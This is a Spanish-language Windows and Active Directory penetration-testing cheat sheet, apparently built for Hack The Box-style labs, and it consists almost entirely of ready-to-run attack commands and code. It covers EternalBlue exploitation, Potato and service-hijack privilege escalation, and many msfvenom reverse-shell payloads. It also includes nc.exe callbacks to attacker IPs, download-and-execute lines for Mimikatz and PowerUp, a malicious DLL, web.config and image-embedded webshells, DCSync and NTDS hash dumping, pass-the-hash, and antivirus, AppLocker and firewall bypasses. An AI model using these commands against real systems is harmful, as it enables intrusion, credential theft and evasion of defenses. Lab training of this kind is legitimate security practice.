ENUMERACIÓN
¿Cual es el sistema operativo y que arquitectura tiene?
¿Quién eres tú?
1
2
3
| C:\> whoami
C:\> echo %USERNAME%
PS C:\> $env:UserName
|
¿Algún privilegio de usuario interesante?
1
2
| C:\> whoami /priv
C:\> whoami /all
|
¿Qué usuarios están en el sistema?
1
2
3
| C:\> net users
C:\> dir /b /ad "C:\Users\"
C:\> dir /b /ad "C:\Documents and Settings\"
|
1
2
| PS C:\> Get-LocalUser | ft Name,Enabled,LastLogon
PS C:\> Get-ChildItem C:\Users -Force | select Name
|
¿Qué software está instalado?
1
2
3
| C:\> dir /a "C:\Program Files"
C:\> dir /a "C:\Program Files (x86)"
C:\> reg query HKEY_LOCAL_MACHINE\SOFTWARE
|
1
2
| PS C:\> Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
PS C:\> Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
|
¿Qué grupos hay en el sistema?
1
| PS C:\> Get-LocalGroup | ft Name
|
¿Alguien más ha iniciado sesión?
¿Que usuarios pertenecen al grupo de administradores?
1
| C:\> net localgroup Administrators
|
1
| PS C:\> Get-LocalGroupMember Administrators | ft Name, PrincipalSource
|
¿Hay algunas credenciales en el winlogon?
1
| C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
|
1
| PS C:\> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
|
¿Alguna información oculta dentro de un archivo? (Alterante Data Stream)
1
2
3
| C:\> dir /r
#example.txt:root.txt:$DATA
C:\> more < example.txt:root.txt
|
¿Algo interesante en Credential Manager?
1
2
3
| C:\> cmdkey /list
C:\> dir C:\Users\username\AppData\Local\Microsoft\Credentials\
C:\> dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
|
1
2
| PS C:\> Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
PS C:\> Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
|
Enumeración SMB.
1
2
3
4
| intrusionz3r0@kali:~$ smbclient -L x.x.x.x -U "null" -N
intrusionz3r0@kali:~$ smbmap -R -H x.x.x.x -u "null"
intrusionz3r0@kali:~$ smbget -rR smb://x.x.x.x/Secure$/IT/Carl/ -U "jamon"
intrusionz3r0@kali:~$ mount -t cifs //x.x.x.x/RECURSO /mnt/HTB/FOLDER -o username=USER,password=PASS,rw
|
Enumeración NFS y rpcbind.
1
2
3
| intrusionz3r0@kali:~$ rpcinfo irked.htb
intrusionz3r0@kali:~$ showmount -e remote.htb
intrusionz3r0@kali:~$ mount -t nfs -o vers=2 IP:RECURSO /mnt/HTB/FOLDER
|
Powershell PortScan.
1
| PS C:\> 0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<ip>",$_)) "Port $_ is open!"} 2>$null
|
SCRIPTS
PowerUp.ps1
1
| powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://[IP]:PORT/PowerUp.ps1');Invoke-AllChecks
|
Sherlock.ps1
1
| powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://[IP]:PORT/Sherlock.ps1');Find-AllVulns
|
Mimikatz.ps1
1
| IEX(New-Object Net.WebClient).downloadString('<url>/MimiKatz.ps1') ;Invoke-Mimikatz -DumpCreds
|
Windows-Exploit-Suggester
1
2
| intrusionz3r0@kali:~$ ./windows-exploit-suggester.py --update
intrusionz3r0@kali:~$ ./windows-exploit-suggester.py --database xxxx-xx-xx-mssb.xlsx --systeminfo systeminfo.txt
|
EXPLOITS
EternalBlue (MS17-010).
Explotación de EternalBlue #1
Repositorio: AutoBlue-MS17-010.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
| intrusionz3r0@kali:~$ eternal_checker.py [IP]
intrusionz3r0@kali:~$ sudo ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
[TUIP]
LPORT you want x64 to listen on:
[TUPUERTO]
LPORT you want x86 to listen on:
[TUPUERTO]
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.19 LPORT=1235
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
intrusionz3r0@kali:~$ python eternalblue_exploit7.py [IP] shellcode/sc_all.bin
|
Explotación de EternalBlue #2
Repositorio: MS17-010.
1
2
| intrusionz3r0@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=[TUPUERTO] -f exe > eternalblue.exe
intrusionz3r0@kali:~$ python send_and_execute.py [IP] eternalblue.exe 445 [PIPE]
|
Explotación de EternalBlue #3
Repositorio: MS17-010.
1
| intrusionz3r0@kali:~$ python checker.py [IP]
|
Modificamos el método smb_pwn() del archivo zzz_exploit.py.
1
2
3
4
5
6
7
8
9
10
11
12
| def smb_pwn(conn, arch):
#smbConn = conn.get_smbconnection()
#print('creating file c:\\pwned.txt on the target')
#tid2 = smbConn.connectTree('C$')
#fid2 = smbConn.createFile(tid2, '/pwned.txt')
#smbConn.closeFile(tid2, fid2)
#smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
service_exec(conn, r'cmd /c [Comando]')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
|
1
| intrusionz3r0@kali:~$ python zzz_exploit.py [IP] [pipes]
|
Windows Server 2003 and IIS 6.0 Privilege escalation.
Repositorio: Churrasco.exe
1
| c:\> churrasco -d [COMANDO]
|
JuicyPotato.exe
Repositorio: JuicyPotato.exe.
1
| c:\> \\10.10.x.x\smbFolder\JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a " /C \\[IP]\smbFolder\nc.exe -e cmd [IP] [PUERTO]" -t *
|
Si el CLSID no es el correcto puede buscarlo en el siguiente articulo: https://ohpe.it/juicy-potato/CLSID/ una vez lo encuentre insertelo en el comando de arriba con el parámetro -c {CLSID}.
RoguePotato Windows Server 2019.
Repositorio: RoguePotato
1
| intrusionz3r0@kali:~$ socat tcp-listen:135,reuseaddr,fork tcp:[IPVICTIMA]:9999
|
1
| c:\> RoguePotato.exe -r [TUIP] -e "C:\windows\system32\cmd.exe" -l 9999
|
Chimichurri.exe (MS10-059)
Repositorio: Chimichurri.exe
1
| c:\> Chimichurri.exe [IP] [PORT]
|
bfill.exe (MS16-098)
Repositorio: MS16-098.
Runas Privesc
1
| c:\> runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \\10.10.x.x\share\nc.exe -e [IP] [PORT]"
|
Vulnerabilidad de Kerberos (MS14-068)
Repositorio: goldenPac.py.
1
| intrusionz3r0@kali:~$ python goldenPac.py domain.net/USER:PASS11@domain-host
|
MSFVENOM PAYLOADS.
Listar payloads.
1
| intrusionz3r0@kali:~$ msfvenom -l payloads | grep android
|
Linux meterpreter reverse shell TCP.
1
| intrusionz3r0@kali:~$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f elf > rev
|
Linux reverse shell TCP.
1
| intrusionz3r0@kali:~$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f elf > rev
|
Windows meterpreter reverse shell TCP.
1
| intrusionz3r0@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > shell.exe
|
Windows reverse shell TCP.
1
| intrusionz3r0@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > shell.exe
|
Mac meterpreter reverse shell TCP.
1
| intrusionz3r0@kali:~$ msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f macho > shell.macho
|
Mac reverse shell TCP.
1
| intrusionz3r0@kali:~$ msfvenom -p osx/x86/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f macho > shell.macho
|
Android meterpreter reverse shell TCP
1
| intrusionz3r0@kali:~$ msfvenom –p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] > rev.apk
|
Android reverse shell TCP
1
| intrusionz3r0@kali:~$ msfvenom –p android/shell/reverse_tcp LHOST=[IP] LPORT=[PORT] > rev.apk
|
PHP Meterpreter Reverse TCP
1
| intrusionz3r0@kali:~$ msfvenom -p php/meterpreter_reverse_tcp LHOST=[IP] LPORT=[PORT] -f raw > shell.php
|
PHP Reverse TCP
1
| intrusionz3r0@kali:~$ msfvenom -p php/reverse_php LHOST=[IP] LPORT=[PORT] -f raw > shell.php
|
ASP Meterpreter Reverse TCP
1
| intrusionz3r0@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f asp > shell.asp
|
ASP Reverse TCP
1
| intrusionz3r0@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f asp > shell.asp
|
JSP Reverse TCP
1
| intrusionz3r0@kali:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f raw > shell.jsp
|
WAR reverse TCP
1
| intrusionz3r0@kali:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f war > shell.war
|
Python Reverse Shell
1
| intrusionz3r0@kali:~$ msfvenom -p cmd/unix/reverse_python LHOST=[IP] LPORT=[PORT] -f raw > shell.py
|
Bash Unix Reverse Shell
1
| intrusionz3r0@kali:~$ msfvenom -p cmd/unix/reverse_bash LHOST=[IP] LPORT=[PORT] -f raw > shell.sh
|
Perl Unix Reverse shell
1
| intrusionz3r0@kali:~$ msfvenom -p cmd/unix/reverse_perl LHOST=[IP] LPORT=[PORT] -f raw > shell.pl
|
Windows Meterpreter Reverse TCP Shellcode
1
| intrusionz3r0@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f [Lenguaje]
|
Linux Meterpreter Reverse TCP Shellcode
1
| intrusionz3r0@kali:~$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f [Lenguaje]
|
Mac Reverse TCP Shellcode
1
| intrusionz3r0@kali:~$ msfvenom -p osx/x86/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f [Lenguaje]
|
RCE CON ARCHIVOS.
RCE con web.config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| <?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("ping 10.10.14.28")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>
|
Shell en php dentro de una imagen.
1
| intrusionz3r0@kali:~$ exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' windows.png
|
SERVICIOS.
1
2
3
4
5
6
| c:\> sc start <nombre>
c:\> sc stop <nombre>
PS c:\> Start-Service -Name <nombre>
PS c:\> Stop-Service -Name <nombre> -Force
PS c:\> Get-Service -Name <nombre>
PS c:\> Get-Childitem -recurse HKLM:\SYSTEM\CurrentControlSet\Services | where name -like "Servicio"
|
UsoSvc Privilege Escalation.
1
2
3
4
| c:\> sc.exe stop UsoSvc
c:\> sc.exe config UsoSvc binpath= "cmd \c C:\Temp\nc.exe [IP] [PUERTO] -e cmd.exe"
c:\> sc.exe qc usosvc
c:\> sc.exe start UsoSvc
|
SecLogon Privilege Escalation.
1
2
3
| c:\> reg query HKLM\System\CurrentControlSet\Services\seclogon
c:\> reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon" /t REG_EXPAND_SZ /v ImagePath /d "c:\Temp\nc.exe [TUIP] [TUPUERTP] -e cmd.exe" /f
c:\> sc start seclogon
|
AD PRIVILEGE ESCALATION
DnsAdmin Privilege Escalation.
1
2
3
4
| intrusionz3r0@kali:~$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f dll > privesc.dll
PS c:\> dnscmd RESOLUTE /config /serverlevelplugindll C:\Windows\System32\spool\drivers\color\privesc.dll
PS c:\> sc stop dns
PS c:\> sc start dns
|
AD Recycle Bin
Recuperar objetos de un DC.
1
| PS c:\> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
|
Azure Admins
Repositorio: Azure-ADConnect.ps1.
1
2
| PS c:\> Import-Module .\Azure-ADConnect.ps1
PS c:\> Azure-ADConnect -server [IP] -db ADSync
|
SeBackupPrivilege
1- Creamos un archivo: mount.txt
1
2
3
4
| set context persistent nowriters
add volume c: alias intrusion
create
expose %intrusion% x:
|
2- Lo transferimos a la máquina y montamos la partición.
1
| c:\> diskshadow.exe /s C:\intrusion\priv.txt
|
3- Transferimos los dll e importamos los módulos.
Repositorio: SeBackupPrivilege.
1
2
3
4
5
| PS c:\> Import-Module .\SeBackupPrivilegeUtils.dll
PS c:\> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS c:\> Set-SeBackupPrivilege
PS c:\> Copy-FileSeBackupPrivilege x:\Windows\NTDS\ntds.dit c:\intrusion\ntds.dit
PS c:\> reg save HKLM\SYSTEM c:\intrusion\system
|
Dump NTDS.dit
1
| secretsdump.py -ntds ntds.dit -system system -hashes LMHASH:NTHASH local -outputfile nt-hashes
|
DCSync
1
| intrusionz3r0@kali:~$ secretsdump.py -just-dc-user Administrator DOMAIN/USER:PASSWORD@[IP]
|
Kerberoast
1
2
3
| intrusionz3r0@kali:~$ GetUserSPNs.py -request -dc-ip [IP] DOMAIN/USER
intrusionz3r0@kali:~$ cme ldap active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 --kerberoasting TGS-REP
PS c:\> powershell.exe -Command 'IEX (New-Object Net.Webclient).DownloadString("http://[IP]:[PORT]/Invoke-Kerberoast.ps1");Invoke-Kerberoast -OutputFormat Hashcat
|
ASREPRoast
1
2
| intrusionz3r0@kali:~$ cme ldap [IP] -u users.txt -p '' --asreproast AR_REP --kdcHost [IP]
intrusionz3r0@kali:~$ python GetNPUsers.py DOMAIN/ -usersfile usernames.txt -format hashcat -outputfile output.txt
|
Passthehash.
1
2
3
| intrusionz3r0@kali:~$ psexec.py -hashes ad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Administrator@[IP]
intrusionz3r0@kali:~$ pth-winexe -U WORKGROUP/Administrator%aad3c435b514a4eeaad3b935b51304fe:c46b9e588fa0d112de6f59fd6d58eae3 //[IP] cmd.exe
intrusionz3r0@kali:~$ evil-winrm -i [IP] -u [USER] -H 9658d1d1dcd9250115e2205d9f48400d
|
Dump Hashes NTLM
1
| intrusionz3r0@kali:~$ secretsdump.py -just-dc-ntlm MEGABANK.LOCAL/Administrator:PASS@[IP]
|
ESCRITORIO REMOTO
Una vez que tengas acceso como administrador.
1
2
3
4
5
| c:\> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow
c:\> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=out localport=3389 action=allow
c:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
intrusionz3r0@kali:~$ xfreerdp /u:USER /d:DOMAIN /p:PASSWORD /v:[IP]
|
CAMBIAR DE USUARIO POWERSHELL.
1
2
3
4
5
| PS c:\> $username = 'batman'
PS c:\> $password = 'Zx^#QZX+T!123'
PS c:\> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS c:\> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS c:\> enter-pssession -computername arkham -credential $credential
|
EJECUTAR COMANDOS CON OTRO USUARIO POWERSHELL.
1
2
3
4
5
| PS c:\> $user = 'DOMAIN\USER'
PS c:\> $pw = 'PASSWORD'
PS c:\> $secpw = ConvertTo-SecureString $pw -AsPlainText -Force
PS c:\> $cred = New-Object System.Management.Automation.PSCredential $user,$secpw
PS c:\> Invoke-Command -Computer localhost -Credential $cred -ScriptBlock {c:\Temp\nc.exe [TUIP] [TUPORT]}
|
DESCARGA DE ARCHIVOS.
1
2
3
4
5
6
7
8
9
10
11
| c:\> certutil.exe -f -urlcache -split http://[IP]/archivo archivo
c:\> copy \\[IP]\Recurso\archivo
PS c:\> powershell IEX(New-Object Net-WebClient).downloadFile('http://[IP]/archivo','C:\Temp\archivo')
PS c:\> IWR -URI http://[IP]/archivo -OutFile archivo
PS c:\> Invoke-WebRequest http://[IP]/archivo -OutFile archivo
PS c:\> powershell wget http://[IP]/archivo -OutFile archivo
|
Descarga e interpreta.
1
| PS c:\> powershell IEX(New-Object Net-WebClient).downloadString('http://[IP]/archivo.ps1');Invoke-AllChecks
|
POWERSHELL NATIVA
1
2
3
4
5
| PS c:\> C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell IEX(New-Object Net.WebClient).downloadString('http://[IP]/script.ps1')
PS C:\> [Environment]::Is64BitProcess
True
PS C:\> [Environment]::Is64BitOperatingSystem
True
|
HISTORIAL DE POWERSHELL
1
2
| PS C:\Users\Stacy\Documents> (Get-PSReadLineOption).HistorySavePath
PS C:\Users\Stacy\Documents> cd $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\
|
FIREWALL
Listar reglas de firewall.
1
| c:\> netsh advfirewall firewall show rule name=all
|
Desactivar Firewall
1
| c:\> netsh Advfirewall set allprofiles state off
|
PORT FORWARDING
1
2
| PS c:\> plink.exe -l root -pw [TUPASSWORD] -R 445:127.0.0.1:445 [TUIP]
PS c:\> ssh -R [TUPUERTO]:localhost:80 user@[IP]
|
PENTESTING ORACLE
Repositorio: odat.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| #Ejecutar todos los modulos.
intrusionz3r0@kali:~$ python3 odat.py all -s 10.10.10.x -p 1521
#Comprobar si es vulnerable a CVE-2012-1675.
intrusionz3r0@kali:~$ python3 odat.py tnspoison -s 10.10.10.x -p 1521 -d ORCL --test-module
#Subir Archivos.
intrusionz3r0@kali:~$ python3 odat.py dbmsxslprocessor -s 10.10.10.x -d XE -U "example" -P "example" --sysdba --putFile "c:\\inetpub\\wwwroot" "cmdasp.aspx" /home/intrusionz3r0/../cmdasp.aspx
#Subir Binarios.
intrusionz3r0@kali:~$ python3 odat.py utlfile -s 10.10.10.x -U "example" -P "example" -d XE --sysdba --putFile \\temp shell.exe /home/intrusionz3r0/shell.exe
#Ejecutar binario.
intrusionz3r0@kali:~$ python3 odat.py externaltable -s 10.10.10.x -U "example" -P "example" -d XE --sysdba --exec \\temp shell.exe
|
WINDOWS DEFENDER BYPASS
Repositorio: GreatSCT.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| intrusionz3r0@kali:~$ sudo ./GreatSCT.py --ip 10.10.x.x --port 1234 -t bypass -p regsvcs/meterpreter/rev_tcp.py -o serv
===============================================================================
Great Scott!
===============================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================
[*] Language: regsvcs
[*] Payload Module: regsvcs/meterpreter/rev_tcp
[*] DLL written to: /usr/share/greatsct-output/compiled/serv4.dll
[*] Source code written to: /usr/share/greatsct-output/source/serv4.cs
[*] Execute with: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe serv4.dll
[*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/serv4.rc
intrusionz3r0@kali:~$ cd /usr/share/greatsct-output/compiled/ && sudo python3 -m http.server 80
intrusionz3r0@kali:~$ msfconsole -r /usr/share/greatsct-output/handlers/serv.rc
Execute: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Temp\serv.dll
|
Evadir AV
1
2
3
4
5
6
7
8
| #include<stdio.h>
#include<stdlib.h>
int main()
{
system("nc.exe -e cmd.exe [IP] [PORT]");
return 0;
}
|
1
2
3
| #sudo apt-get install mingw-w64
intrusionz3r0@kali:~$ i686-w64-mingw32-gcc -o rev32.exe rev32.c
intrusionz3r0@kali:~$ x86_64-w64-mingw32-gcc -o rev64.exe rev64.c
|
DLL Maliciosa.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| #include <windows.h>
#include <stdio.h>
#include <stdlib.h>
int pwn()
{
system("C:\\Temp\\nc.exe -e cmd.exe 10.10.14.22 1234");
return 0;
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
pwn();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
|
1
| intrusionz3r0@kali:~$ x86_64-w64-mingw32-gcc -o pwn.dll pwn.c -shared
|
APPLOCKER BYPASS MSBuild
Repositorio: executes shellcode.xml.
1
| intrusionz3r0@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=[TUIP] LPORT=[TUPUERTO] -f csharp -e x86/shikata_ga_nai -i 20 > output.cs
|
- La shellcode generada debe remplazarse en el archivo descargado.
- Renombrar el archivo con extension
.csproj. - Ejecutar con msbuild.
1
| PS c:\> C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\file.csproj
|
PowerShell Constrained Language
1
2
| PS c:\> $executioncontext.sessionstate.languagemode
PS c:\> (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).EnableLUA
|
SMB RELAY SQLI
Encendemos el reponder
1
2
3
4
5
6
7
| intrusionz3r0@kali:~$ sudo responder -I tun0 -r -d -w -v
#Execute: http://example/mvc/Product.aspx?id=1;exec master.sys.xp_dirtree "\\10.10.14.22\capture"
[SMB] NTLMv2-SSP Client : x.x.x.x
[SMB] NTLMv2-SSP Username : example\example
[SMB] NTLMv2-SSP Hash : Example::example:3836b33745f3a34e:5C9090CA87239EDC83EBECFD1C8DE863:0101000000000000C0653150DE09D2016F7D1FB2C317EC3D000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000000000000003000005690C5FD3744C7EFC6832CDAA32270D100257A53238D9C45FD1E1BEDD27C53B00A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E003300370000000000000000000000000
|
